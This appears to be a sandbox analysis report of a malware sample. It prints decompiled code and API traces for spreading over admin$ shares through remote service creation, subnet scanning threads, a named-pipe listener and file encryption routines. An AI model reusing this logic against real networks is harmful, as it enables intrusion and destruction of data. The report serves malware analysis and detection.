Part of subcall function 007B88D3: PathFindFileNameW.SHLWAPI(007C7BC8,76B5C0B0,?,007B95B2), ref: 007B88E3

wsprintfW.USER32 ref: 007B95C9
wsprintfW.USER32 ref: 007B95EF
PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 007B95FC
wsprintfW.USER32 ref: 007B961A
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007B9637
PathFileExistsW.SHLWAPI(?), ref: 007B9649
GetLastError.KERNEL32 ref: 007B9653
GetLastError.KERNEL32(?), ref: 007B9674
WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 007B96B9
OpenSCManagerW.ADVAPI32(?,00000000,000F003F,?,?), ref: 007B9714
memset.MSVCRT ref: 007B9735
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 007B9742
wsprintfW.USER32 ref: 007B975A
CreateServiceW.ADVAPI32(?,?,00000000,000F01FF,00000010,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 007B9783
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 007B9798
GetLastError.KERNEL32 ref: 007B97A6
QueryServiceStatus.ADVAPI32(?,?), ref: 007B97D5
Sleep.KERNEL32(00001388), ref: 007B97E7
DeleteService.ADVAPI32(?), ref: 007B97F7
CloseServiceHandle.ADVAPI32(?), ref: 007B9801
GetLastError.KERNEL32 ref: 007B9809
CloseServiceHandle.ADVAPI32(?), ref: 007B9822
GetLastError.KERNEL32 ref: 007B982A

Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000008,?,76B5C0B0,00000000), ref: 007B68EB
Part of subcall function 007B68B5: HeapAlloc.KERNEL32(00000000), ref: 007B68F4
Part of subcall function 007B68B5: memcpy.MSVCRT ref: 007B6921
Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000008,?,74654D40), ref: 007B6946
Part of subcall function 007B68B5: HeapAlloc.KERNEL32(00000000), ref: 007B6949
Part of subcall function 007B68B5: memcpy.MSVCRT ref: 007B6978
Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 007B6995
Part of subcall function 007B68B5: HeapFree.KERNEL32(00000000), ref: 007B6998
Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000000,?), ref: 007B699F
Part of subcall function 007B68B5: HeapFree.KERNEL32(00000000), ref: 007B69A2

DeleteFileW.KERNEL32(?), ref: 007B983E
WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 007B9857
SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,007BA0AD,00000000,00000000,00000000,00000000,007B6AA8,00000000,00000000,00000000,00000024,007B6AA8), ref: 007B9878

Strings

%08X%08X, xrefs: 007B9754
1u, xrefs: 007B9783
\\%ws\admin$\%ws, xrefs: 007B95BB, 007B95C7, 007B95ED, 007B9618
W, xrefs: 007B985F
\\%s\admin$, xrefs: 007B9578
cscc.dat, xrefs: 007B960B

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$ErrorLastService$wsprintf$FileProcess$Connection2Path$AllocCancelCloseDeleteFindFreeHandleTimememcpy$CreateExistsExtensionManagerNameOpenQuerySleepStartStatusSystemmemset
String ID: 1u$%08X%08X$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat
API String ID: 719309661-3806666214
Opcode ID: 23ebc316ccabc7f65ff3b321dc4a13093417aae32e1dc40f2b38093263df2cf2
Instruction ID: 1c410d33aed0526f724cb81d2350a77815f4264948e59b08ae24ef6b04e03393
Opcode Fuzzy Hash: 23ebc316ccabc7f65ff3b321dc4a13093417aae32e1dc40f2b38093263df2cf2
Instruction Fuzzy Hash: F091F7B1508385AFDB20DF64D888FDBB7E8BF85304F04492EF699D2160EB78D9448B56

Uniqueness

Uniqueness Score: -1.00%

Function 007B8B2E Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 158
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E007B8B2E(intOrPtr* _a4, void* _a8, int _a16, void _a20, int _a4112, void _a4116) {
				int _v0;
				int _v4;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __esi;
				void* _t69;
				void* _t73;
				void* _t75;
				signed int _t77;
				signed int _t80;
				void _t81;
				void* _t84;
				void* _t93;
				void* _t100;
				struct _SECURITY_ATTRIBUTES* _t101;
				signed int _t105;
				signed int _t108;
				signed int _t109;
				void* _t110;
				intOrPtr* _t112;
				intOrPtr* _t113;
				void* _t114;
				intOrPtr* _t115;
				void* _t117;
				signed int _t122;
				void* _t125;

				E007BA760(0x3014);
				_t101 = 0;
				_a16 = 0;
				memset( &_a20, 0, 0xffc);
				_a4112 = 0;
				memset( &_a4116, 0, 0x1ffc);
				_t115 = __imp__GetAdaptersInfo;
				_t125 = (_t122 & 0xfffffff8) + 0x18;
				_a8 = 0;
				_v4 = 0;
				_v0 = 0;
				_t69 =  *_t115(0,  &_a8, _t110, _t114, _t100); // executed
				if(_t69 != 0x6f) {
					L23:
					return 0;
				}
				_t112 = LocalAlloc(0x40, _v0);
				_a4 = _t112;
				if(_t112 == 0) {
					goto L23;
				}
				_t73 =  *_t115(_t112,  &_v0); // executed
				if(_t73 != 0) {
					L22:
					LocalFree(_v4);
					goto L23;
				}
				while(_v20 < 0x400) {
					if( *((intOrPtr*)(_t112 + 0x1a4)) != _t101) {
						_t28 = _t112 + 0x200; // 0x200
						_t93 = E007B641A(_t28);
						_v24 = _t93;
						if(_t93 != _t101) {
							E007B6B95(_t93, 0, _a4);
							HeapFree(GetProcessHeap(), _t101, _v24);
						}
					}
					_t112 =  *_t112;
					_v28 = _v28 + 1;
					if(_t112 != _t101) {
						continue;
					}
					break;
				}
				_t75 = E007B7D4E(_t103); // executed
				if(_t75 != 0) {
					E007B8D39(_a4);
				}
				if(_v20 <= _t101) {
					L20:
					if(_v16 <= _t101) {
						goto L22;
					} else {
						goto L21;
					}
					do {
						L21:
						CloseHandle( *(_t125 + 0x20 + _t101 * 4));
						_t101 =  &(_t101->nLength);
					} while (_t101 < _v16);
					goto L22;
				} else {
					_t113 = __imp__#14;
					do {
						_t77 = LocalAlloc(0x40, 0xc);
						_t117 = _t77;
						if(_t117 != _t101) {
							__imp__#11("255.255.255.255");
							_t108 = _v20;
							_t109 =  *(_t125 + 0x1024 + _t108 * 8);
							_t105 =  *(_t125 + 0x1020 + _t108 * 8) & _t109;
							if(_t105 != 0) {
								_t80 = _t77 ^ _t109 | _t105;
								_v16 = _t80;
								if(_t80 != 0) {
									_t81 =  *_t113(_t105);
									 *_t117 = _t81;
									 *((intOrPtr*)(_t117 + 4)) =  *_t113(_v20);
									 *((intOrPtr*)(_t117 + 8)) = _a4;
									_t84 = CreateThread(_t101, _t101, E007B8AB3, _t117, _t101, _t101); // executed
									if(_t84 != _t101) {
										 *(_t125 + 0x20 + _v32 * 4) = _t84;
									}
								}
							}
						}
						_v16 = _v16 + 1;
					} while (_v16 < _v20);
					goto L20;
				}
			}

0x007b8b39
0x007b8b41
0x007b8b4e
0x007b8b52
0x007b8b68
0x007b8b6f
0x007b8b74
0x007b8b7a
0x007b8b83
0x007b8b87
0x007b8b8b
0x007b8b8f
0x007b8b94
0x007b8d2e
0x007b8d36
0x007b8d36
0x007b8ba6
0x007b8ba8
0x007b8bae
0x00000000
0x00000000
0x007b8bba
0x007b8bbe
0x007b8d24
0x007b8d28
0x00000000
0x007b8d28
0x007b8bc4
0x007b8c37
0x007b8c39
0x007b8c40
0x007b8c45
0x007b8c4b
0x007b8c52
0x007b8c63
0x007b8c63
0x007b8c4b
0x007b8c69
0x007b8c6b
0x007b8c71
0x00000000
0x00000000
0x00000000
0x007b8c71
0x007b8c77
0x007b8c7e
0x007b8c83
0x007b8c83
0x007b8c8c
0x007b8d0d
0x007b8d11
0x00000000
0x00000000
0x00000000
0x00000000
0x007b8d13
0x007b8d13
0x007b8d17
0x007b8d1d
0x007b8d1e
0x00000000
0x007b8c8e
0x007b8c8e
0x007b8c94
0x007b8c98
0x007b8c9e
0x007b8ca2
0x007b8ca9
0x007b8caf
0x007b8cba
0x007b8cc1
0x007b8cc3
0x007b8cc7
0x007b8cc9
0x007b8ccd
0x007b8cd0
0x007b8cd6
0x007b8ce2
0x007b8cea
0x007b8ced
0x007b8cf5
0x007b8cfb
0x007b8cfb
0x007b8cf5
0x007b8ccd
0x007b8cc3
0x007b8cff
0x007b8d07
0x00000000
0x007b8c94

APIs

memset.MSVCRT ref: 007B8B52
memset.MSVCRT ref: 007B8B6F
GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 007B8B8F
LocalAlloc.KERNEL32(00000040,?), ref: 007B8BA0
GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 007B8BBA
inet_addr.WS2_32(000001B0), ref: 007B8BDF
inet_addr.WS2_32(000001C0), ref: 007B8BF3

Part of subcall function 007B641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,77974AB0,?), ref: 007B6439
Part of subcall function 007B641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B6446
Part of subcall function 007B641A: HeapAlloc.KERNEL32(00000000), ref: 007B644D
Part of subcall function 007B641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 007B6465

GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 007B8C24
HeapFree.KERNEL32(00000000), ref: 007B8C2B
GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 007B8C5C
HeapFree.KERNEL32(00000000), ref: 007B8C63
LocalAlloc.KERNEL32(00000040,0000000C), ref: 007B8C98
inet_addr.WS2_32(255.255.255.255), ref: 007B8CA9
htonl.WS2_32(?), ref: 007B8CD0
htonl.WS2_32(?), ref: 007B8CD8
CreateThread.KERNELBASE(00000000,00000000,Function_00008AB3,00000000,00000000,00000000), ref: 007B8CED
CloseHandle.KERNEL32(?), ref: 007B8D17
LocalFree.KERNEL32(?), ref: 007B8D28

Strings

255.255.255.255, xrefs: 007B8CA4
Oet Uet0Xet, xrefs: 007B8C24, 007B8C5C

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$AllocFreeLocalProcessinet_addr$AdaptersByteCharInfoMultiWidehtonlmemset$CloseCreateHandleThread
String ID: Oet Uet0Xet$255.255.255.255
API String ID: 698255058-1172651094
Opcode ID: 51f2f6155b07b7292745e9c6291b6042df116d4834be31a6a84ad65410b82645
Instruction ID: 7694b99674994e8a507da8b00b35d748acfea4aa4db3fc77cdca986bcc4a7acd
Opcode Fuzzy Hash: 51f2f6155b07b7292745e9c6291b6042df116d4834be31a6a84ad65410b82645
Instruction Fuzzy Hash: D8515FB1504346AFC710EF64D888EEBBBE9FB88310F14492EF595D2150DB38D945CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 007B15A7 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 152
encryptionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E007B15A7(intOrPtr _a4, intOrPtr _a8, void* _a12, void** _a16, intOrPtr _a20) {
				char _v8;
				long* _v12;
				signed int _v16;
				long* _v20;
				long _v24;
				char _v44;
				void* _t45;
				long** _t47;
				int _t48;
				void** _t52;
				int _t56;
				char* _t58;
				char* _t59;
				void* _t61;
				void* _t64;
				long _t70;
				int _t71;

				_v12 = 0;
				_v20 = 0;
				_v8 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t70 = 0x10;
				asm("stosd");
				_v24 = _t70;
				_v16 = 0xbadf00d;
				asm("stosd");
				_t45 = HeapAlloc(GetProcessHeap(), 8, _t70);
				 *_a16 = _t45;
				if(_t45 == 0) {
					L23:
					return _v16;
				}
				_t47 =  &_v12;
				__imp__CryptAcquireContextW(_t47, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000008); // executed
				if(_t47 == 0) {
					goto L23;
				}
				_t48 = 0x8002;
				_t64 = _a20 - 0x8002;
				if(_t64 == 0) {
					_t71 = 0;
					__imp__CryptCreateHash(_v12, 0x8002, 0, 0,  &_v8); // executed
					if(0x8002 == 0) {
						L17:
						if(_v8 != _t71) {
							__imp__CryptDestroyHash(_v8);
						}
						if(_v20 != _t71) {
							CryptDestroyKey(_v20);
						}
						if(_v12 != _t71) {
							CryptReleaseContext(_v12, _t71);
						}
						goto L23;
					}
					_v16 = _v16 | 0xffffffff;
					L12:
					if(_v16 == 0xffffffff) {
						__imp__CryptHashData(_v8, _a4, _a8, _t71);
						if(_t48 != 0) {
							_t52 = _a16;
							__imp__CryptGetHashParam(_v8, 2,  *_t52,  &_v24, _t71);
							if(_t52 != 0) {
								_v16 = _t71;
							}
						}
					}
					goto L17;
				}
				if(_t64 != 1) {
					L16:
					_t71 = 0;
					goto L17;
				}
				_v44 = 0x8003;
				_t61 = HeapAlloc(GetProcessHeap(), 8, 0x20);
				if(_t61 == 0) {
					goto L16;
				}
				 *(_t61 + 8) = _t70;
				 *_t61 = 0x208;
				 *((intOrPtr*)(_t61 + 4)) = 0x6602;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t56 = CryptImportKey(_v12, _t61, 0x20, 0, 0x100,  &_v20); // executed
				if(_t56 != 0) {
					_t58 =  &_v8;
					__imp__CryptCreateHash(_v12, 0x8009, _v20, 0, _t58);
					if(_t58 != 0) {
						_t59 =  &_v44;
						__imp__CryptSetHashParam(_v8, 5, _t59, 0);
						if(_t59 != 0) {
							_v16 = _v16 | 0xffffffff;
						}
					}
				}
				_t48 = HeapFree(GetProcessHeap(), 8, _t61);
				_t71 = 0;
				goto L12;
			}

0x007b15b8
0x007b15bb
0x007b15be
0x007b15c4
0x007b15c5
0x007b15c8
0x007b15c9
0x007b15ca
0x007b15ce
0x007b15d1
0x007b15d8
0x007b15e2
0x007b15e7
0x007b15eb
0x007b173d
0x007b1744
0x007b1744
0x007b15ff
0x007b1603
0x007b160b
0x00000000
0x00000000
0x007b1614
0x007b1619
0x007b161b
0x007b16c2
0x007b16ca
0x007b16d2
0x007b1712
0x007b1715
0x007b171a
0x007b171a
0x007b1723
0x007b1728
0x007b1728
0x007b1731
0x007b1737
0x007b1737
0x00000000
0x007b1731
0x007b16d4
0x007b16d8
0x007b16dc
0x007b16e8
0x007b16f0
0x007b16f7
0x007b1701
0x007b1709
0x007b170b
0x007b170b
0x007b1709
0x007b16f0
0x00000000
0x007b16dc
0x007b1622
0x007b1710
0x007b1710
0x00000000
0x007b1710
0x007b162c
0x007b1638
0x007b163c
0x00000000
0x00000000
0x007b1642
0x007b1648
0x007b164e
0x007b1658
0x007b1659
0x007b165a
0x007b1664
0x007b166e
0x007b1676
0x007b1678
0x007b1688
0x007b1690
0x007b1693
0x007b169c
0x007b16a4
0x007b16a6
0x007b16a6
0x007b16a4
0x007b1690
0x007b16b4
0x007b16ba
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000010,77D74620,?,74654F20), ref: 007B15D9
HeapAlloc.KERNEL32(00000000), ref: 007B15E2
CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000008), ref: 007B1603
GetProcessHeap.KERNEL32(00000008,00000020), ref: 007B1633
HeapAlloc.KERNEL32(00000000), ref: 007B1636
CryptImportKey.ADVAPI32(?,00000000,00000020,00000000,00000100,?), ref: 007B166E
CryptCreateHash.ADVAPI32(?,00008009,?,00000000,?), ref: 007B1688
CryptSetHashParam.ADVAPI32(?,00000005,00008003,00000000), ref: 007B169C
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B16AD
HeapFree.KERNEL32(00000000), ref: 007B16B4
CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,?), ref: 007B16CA
CryptHashData.ADVAPI32(?,?,000000FF,00000000), ref: 007B16E8
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 007B1701
CryptDestroyHash.ADVAPI32(?), ref: 007B171A
CryptDestroyKey.ADVAPI32(?), ref: 007B1728
CryptReleaseContext.ADVAPI32(?,00000000), ref: 007B1737

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 007B15F8
Oet Uet0Xet, xrefs: 007B15AE, 007B16AD

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Crypt$HashHeap$Process$AllocContextCreateDestroyParam$AcquireDataFreeImportRelease
String ID: Oet Uet0Xet$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 2620112963-258184132
Opcode ID: 92b624f7cb08d38de4b621e12f5e5f7c8fe8cce749a7f5be718cf2ad0e5ca2ce
Instruction ID: 716ada75ae5a2b285a3163fdb904b7482ec5f457b48f61ffb74ddc1faaa2340c
Opcode Fuzzy Hash: 92b624f7cb08d38de4b621e12f5e5f7c8fe8cce749a7f5be718cf2ad0e5ca2ce
Instruction Fuzzy Hash: A2516A71A00219BBDB219FA5DC49FEEBB79FF08750F908164F501E60A0DB788E01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007B6FFE Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 125
memorypipesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E007B6FFE(WCHAR* _a4) {
				void* _v8;
				long _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES _v28;
				struct _SECURITY_DESCRIPTOR* _t25;
				void* _t30;
				int _t31;
				int _t34;
				WCHAR* _t44;
				void* _t50;
				void* _t51;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v28.nLength = 0xc;
				_v28.bInheritHandle = 0;
				_t25 = HeapAlloc(GetProcessHeap(), 8, 0x14);
				_v28.lpSecurityDescriptor = _t25;
				if(_t25 == 0 || InitializeSecurityDescriptor(_t25, 1) == 0 || SetSecurityDescriptorDacl(_v28.lpSecurityDescriptor, 1, 0, 0) == 0) {
					return 0;
				} else {
					while(1) {
						L3:
						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
						_v8 = _t30;
						if(_t30 == 0xffffffff) {
							continue;
						}
						L4:
						_t31 = ConnectNamedPipe(_t30, 0); // executed
						if(_t31 == 0) {
							L18:
							CloseHandle(_v8);
							do {
								goto L3;
							} while (_t30 == 0xffffffff);
							goto L4;
						} else {
							_t50 = 0x1e;
							do {
								_t50 = _t50 - 1;
								_v12 = 0;
								_t34 = PeekNamedPipe(_v8, 0, 0, 0,  &_v12, 0); // executed
								if(_t34 == 0) {
									goto L9;
								}
								if(_v12 != 0) {
									_t51 = HeapAlloc(GetProcessHeap(), 8, _v12);
									if(_t51 != 0) {
										_v16 = 0;
										if(ReadFile(_v8, _t51, _v12,  &_v16, 0) != 0 && _v16 == _v12) {
											_t44 = StrChrW(_t51, 0x3a);
											if(_t44 != 0) {
												 *_t44 = 0;
												E007B69AE(_t51,  &(_t44[1]), 2);
											}
										}
										HeapFree(GetProcessHeap(), 0, _t51);
									}
									L17:
									FlushFileBuffers(_v8);
									DisconnectNamedPipe(_v8);
									goto L18;
								}
								Sleep(0x3e8); // executed
								L9:
							} while (_t50 != 0);
							goto L17;
						}
						L3:
						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
						_v8 = _t30;
					}
				}
			}

0x007b7012
0x007b7013
0x007b7016
0x007b701b
0x007b7022
0x007b7028
0x007b702e
0x007b7033
0x007b7143
0x00000000
0x007b705f
0x007b705f
0x007b706f
0x007b7075
0x007b707b
0x00000000
0x00000000
0x007b707d
0x007b707f
0x007b7087
0x007b712f
0x007b7132
0x007b705f
0x00000000
0x00000000
0x00000000
0x007b708d
0x007b708f
0x007b7090
0x007b709b
0x007b709c
0x007b709f
0x007b70a7
0x00000000
0x00000000
0x007b70ac
0x007b70cd
0x007b70d1
0x007b70db
0x007b70ea
0x007b70f7
0x007b70ff
0x007b7103
0x007b710d
0x007b710d
0x007b70ff
0x007b7117
0x007b7117
0x007b711d
0x007b7120
0x007b7129
0x00000000
0x007b7129
0x007b70b3
0x007b70b9
0x007b70b9
0x00000000
0x007b70bd
0x007b705f
0x007b706f
0x007b7075
0x007b7078
0x007b705f

APIs

GetProcessHeap.KERNEL32(00000008,00000014), ref: 007B7025
HeapAlloc.KERNEL32(00000000), ref: 007B7028
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 007B703C
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 007B7051
CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 007B706F
ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 007B707F
PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 007B709F
Sleep.KERNELBASE(000003E8), ref: 007B70B3
GetProcessHeap.KERNEL32(00000008,?), ref: 007B70C4
HeapAlloc.KERNEL32(00000000), ref: 007B70C7
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 007B70E2
StrChrW.SHLWAPI(00000000,0000003A), ref: 007B70F7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B7114
HeapFree.KERNEL32(00000000), ref: 007B7117
FlushFileBuffers.KERNEL32(?), ref: 007B7120
DisconnectNamedPipe.KERNEL32(?), ref: 007B7129
CloseHandle.KERNEL32(?), ref: 007B7132

Strings

Uet0Xet, xrefs: 007B7117

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$NamedPipe$Process$AllocDescriptorFileSecurity$BuffersCloseConnectCreateDaclDisconnectFlushFreeHandleInitializePeekReadSleep
String ID: Uet0Xet
API String ID: 1225799970-1689521831
Opcode ID: 8eb0d46dfafd9b88a4c69c0cdb6d19a87036c10c1103b54c486a6de84571502c
Instruction ID: 9da75922b19fc5d921d3dbc6b8c01b89321d8ae61253f81afd94cf8d4a1cd36c
Opcode Fuzzy Hash: 8eb0d46dfafd9b88a4c69c0cdb6d19a87036c10c1103b54c486a6de84571502c
Instruction Fuzzy Hash: 53414B71A0021CBBDB256BA9DC4AFEFBF39EF85750F104515F605E60A0D7788E40DAA4

Uniqueness

Uniqueness Score: -1.00%

Function 007B5BC4 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 127
fileencryptionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E007B5BC4(void* __eflags, void* _a4, intOrPtr _a8, char _a16) {
				void* _v8;
				int _v12;
				void* _v16;
				int _v20;
				struct _SYSTEM_INFO _v56;
				void* _t43;
				long _t45;
				void* _t46;
				intOrPtr _t49;
				long _t52;
				void* _t53;
				long _t62;
				signed int _t63;
				intOrPtr _t76;
				void* _t77;
				void* _t80;
				void* _t81;
				void* _t82;

				_t63 = 8;
				_v56.dwOemId = 0;
				memset( &(_v56.dwPageSize), 0, _t63 << 2);
				_v20 = 0;
				GetSystemInfo( &_v56);
				_t6 =  &_a16; // 0x7b5e4c
				_t80 =  *((intOrPtr*)( *_t6 + 0x44)) + 0x16;
				_t76 = _a8 - _t80;
				asm("sbb [ebp+0x10], ebx");
				asm("adc edx, [ebp+0x10]");
				asm("sbb edx, eax");
				_a8 = _t76;
				_t43 = E007BA6B0(_v56.dwAllocationGranularity + _t76 - 1, 0, _v56.dwAllocationGranularity, 0);
				asm("sbb edx, 0x0");
				_t45 = E007BA670(_t43 - 1, 0, _v56.dwAllocationGranularity, 0);
				_t77 = _t76 - _t45;
				_t62 = _t77 + _t80;
				_t46 = MapViewOfFile(_a4, 6, 0, _t45, _t62); // executed
				_t81 = _t46;
				_v8 = _t81;
				if(_t81 != 0) {
					_a4 = 0;
					_t16 =  &_a16; // 0x7b5e4c
					_t49 =  *_t16;
					__imp__CryptDuplicateHash( *((intOrPtr*)(_t49 + 0x40)), 0, 0,  &_a4); // executed
					if(_t49 != 0) {
						_t82 = _t81 + _t77;
						__imp__CryptHashData(_a4, _t82, 4, 0);
						if(_t49 != 0) {
							_t19 =  &_a16; // 0x7b5e4c
							_t52 =  *( *_t19 + 0x44);
							_v12 = _t52;
							_t53 = LocalAlloc(0x40, _t52);
							_v16 = _t53;
							if(_t53 != 0) {
								__imp__CryptGetHashParam(_a4, 2, _t53,  &_v12, 0);
								if(_t53 != 0) {
									memcpy(_t82 + 4, _v16, _v12);
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsw");
									_v20 = FlushViewOfFile(_v8, _t62);
								}
								LocalFree(_v16);
							}
						}
						__imp__CryptDestroyHash(_a4);
					}
					UnmapViewOfFile(_v8);
				}
				return _v20;
			}

0x007b5bd1
0x007b5bd4
0x007b5bda
0x007b5be0
0x007b5be3
0x007b5be9
0x007b5bf2
0x007b5bf5
0x007b5bf7
0x007b5c05
0x007b5c0d
0x007b5c11
0x007b5c14
0x007b5c1e
0x007b5c27
0x007b5c2c
0x007b5c2e
0x007b5c39
0x007b5c3f
0x007b5c43
0x007b5c48
0x007b5c54
0x007b5c57
0x007b5c57
0x007b5c5d
0x007b5c65
0x007b5c6f
0x007b5c75
0x007b5c7d
0x007b5c7f
0x007b5c82
0x007b5c88
0x007b5c8b
0x007b5c91
0x007b5c96
0x007b5ca4
0x007b5cac
0x007b5cb8
0x007b5ccf
0x007b5cd0
0x007b5cd1
0x007b5cd5
0x007b5cda
0x007b5ce2
0x007b5ce2
0x007b5ce8
0x007b5ce8
0x007b5c96
0x007b5cf1
0x007b5cf1
0x007b5cfa
0x007b5cfa
0x007b5d07

APIs

GetSystemInfo.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,?,?,?,007B5E4C,?,?,00000000), ref: 007B5BE3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B5C14
MapViewOfFile.KERNELBASE(00000000,00000006,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5C39
CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5C5D
CryptHashData.ADVAPI32(00000000,00000000,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5C75
LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5C8B
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5CA4
memcpy.MSVCRT ref: 007B5CB8
FlushViewOfFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,007B5E4C,?,?), ref: 007B5CDC
LocalFree.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5CE8
CryptDestroyHash.ADVAPI32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5CF1
UnmapViewOfFile.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5CFA

Strings

encrypted, xrefs: 007B5CC6
L^{, xrefs: 007B5BE9, 007B5C57, 007B5C7F, 007B5CBD

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

